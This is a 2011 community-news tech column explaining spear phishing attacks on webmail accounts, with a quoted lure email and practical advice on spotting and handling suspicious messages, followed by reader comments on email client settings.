Ask the Techie: 'Spear Phishing' Attacks on Gmail, Yahoo! Mail and Hotmail

From government officials to your colleagues at work, spear phishing uses social engineering to target email accounts

Breaking news this week told us of government officials being targets of so-called "spear phishing" attacks on their Gmail accounts.  The attacks were traced back to Chinese internet addresses and may have led to the disclosure of significant amounts of government and personal data. 

The attacks were described as spear phishing as they targeted particular groups of people using email language designed to gain trust or look legitimate.  This is in contrast to the typical phishing attack where the bait is more general in nature, say "we have an important message from your bank, please log in here and confirm the transaction."

We are all becoming more savvy about not believing phishing emails.  If you get a message saying it is from your bank, you probably will be a little suspicious and hopefully log in to the bank by going to the bank's Web site itself instead of following a link ().  The difference in spear phishing attacks is that it appears to be legitimate by perhaps saying it is from a friend or co-worker and it uses language that you would encounter in the course of a normal conversation with that person.

The Guardian newspaper quotes the text of one of the emails sent to senior government officials:

One example of a spear phishing email had the title "Fw: Draft US-China Joint Statement" and contained the text: "This is the latest version of State's joint statement. My understanding is that State put in placeholder econ language and am happy to have us fill in but in their rush to get a cleared version from the WH, they sent the attached to Mike."

If the user followed the link, the hacker would attempt to gain their password and either hijack the account or secretly monitor the mail going forward.  Google notified the users and helped to secure the accounts, but it seems that a significant amount of information was compromised.

Phishing is a form of "social engineering."  This means that it isn't just computer code that attacks your computer.  This is when someone tries to trick you into compromising your own privacy.  As we know, con games have been used for centuries, this is just a case of using a con to get you to give up electronic keys or private information instead of actual cash or property.

There is now news that similar attacks were launched against several large businesses, Hotmail and Yahoo! Mail users.  Trendlabs explained in a threat report that Web-based mail servers were targeted and hackers used vulnerabilities to gain access to passwords even without getting user input, such as in the case of Hotmail just by previewing the email a user was vulnerable. 

The attacks are getting more sophisticated, and the bad guys are adapting to the defenses thrown up to defend users.  There are still things you can do to outsmart a phisher or spear phisher.  The best defense is to read suspiciously.  Even in our region where we are used to jargon, acronymns and stilted bureaucratic speech, the paragraph above appears to be "phishy."

Look again at the quoted text above. It is like they randomized the language from a couple of memos, which in fact may have been what they have done.  Or they could have used a program like Google translate to attempt to recreate "Inside-the -Beltway" English.  Whatever the tools used, it doesn't sound right.  If you get an email that looks "off," don't take it at face value.  Maybe shoot a separate email to "Mike" asking if he was working on a joint statement for State, or pick up the phone to ask the same.

You should also follow basic security steps like keeping your software updated and having anti-virus software installed and updated.  If you get an email like this at work, have your IT department take a look at it.  If you do find yourself falling for the bait and clicking on a malicious link, get suspicious if they ask for your password or other private information.  Close your browser and run a virus scan and be aware if unusual things start to happen with your computer.  If your password has been disclosed to a third party, change it on other sites but first make sure that your computer has been scanned and any malware or virus removed.

carl drott June 05, 2011 at 09:37 PM
First set your email client to display only text messages (not HTML) This makes it much easier to see the true address of any links. (99.9% of HTML in emails adds nothing except pretty) Set your client not to open any remote files including graphics. Learn a little about reading the email headers (hey, if you want to drive, you have to learn the rules -- if you want to email -- learn the rules.) If your employer allows email attachments then you are working for a bunch of jerks! Put files on a secure internal server.
Jean Westcott June 06, 2011 at 12:48 AM
More good advice Carl.
Dick Kennedy June 06, 2011 at 06:36 PM
Excellent advice--thanks Jean and Carl. FYI, old-fashioned phishing is still alive and well--I just got a "security alert" from "Bank of America" that looked very legitimate except that it wanted me to input my credit card number. And if you don't want to spend money on an anti-virus program, Consumer Reports recently rated Avira Antivir as good as any of the commercial programs.
Sally Spangler June 09, 2011 at 03:14 PM
Being a user rather than a techie - your comment needs to be brought down to user people level. "email client to display only text messages" client = ? text messages - I understand. No graphics - yes I understand. The ones pictured directly in the email itself rather than must be opened - then what? reading email headers? the true sender email address, Yes? Maybe Carl you should have the blog on your subject? Thanks for heads up.
Jean Westcott June 09, 2011 at 03:24 PM
Sally, Your email client is the email program you use. If you are using Outlook, go to Tools, click Options, and then choose the Security tab. Click the box that says "Block images and other external content in HTML emai" If you aren't using Outlook, you should be able to find a similar setting that prevents non-text portions of emails to be blocked. You will have the option of still downloading the pictures but the default will to not display them. If you have a trusted sender that sends HTML email, you can add them to your safe senders list and it then you won't be asked each time to ok images from a trusted sender. Hope this helps, Jean


More »
Got a question? Something on your mind? Talk to your community, directly.
Note Article
Just a short thought to get the word out quickly about anything in your neighborhood.
Share something with your neighbors.What's on your mind?What's on your mind?Make an announcement, speak your mind, or sell somethingPost something
See more »